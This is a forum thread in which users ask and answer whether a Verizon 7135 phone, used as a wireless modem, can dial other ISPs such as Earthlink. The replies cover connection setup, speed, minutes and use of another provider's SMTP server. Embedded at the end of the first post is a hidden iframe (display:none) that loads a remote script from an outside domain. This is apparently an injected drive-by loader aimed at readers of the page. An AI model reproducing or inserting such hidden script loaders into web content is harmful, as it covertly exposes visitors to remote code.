Can the modem not dial other ISPs?

Its advertised that the 7135 can be used as a wireless modem. I want to dial my company server directly. I cannot surf in via another number. It appears that Verizon wants to BE my ISP on when using the phone, and will only work if I dial the special number with user name and password they gave me. Can't I dial my own ISP? And how does this affect the outgoing mail server setting when sending and receiveing email?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Just create another network connection from PDA Preferences. I dial up to Earthlink, Budget Dialup as well as VZW.

When you dial up to those connections, do your web pages load faster? And how much extra does it cost?

I get QNC speeds since it always connects as "Standard Data" (no matter how it is configured). Therefore, web page speeds are the same. However, there have been times when the VZW network is flaky and I could still get through to my ISP. Usually if VZW's network is down, it doesn't allow any network connections at all. The advantage, IMO, of having another ISP is having use of its SMTP servers.

It still consumes your minutes based on time of day and day of week. The cost to the ISP depends on the ISP. If you have unlimited dialup with your ISP, no cost. For example, I have 20 dialup hours/month w/Earthlink included with their DSL plan.
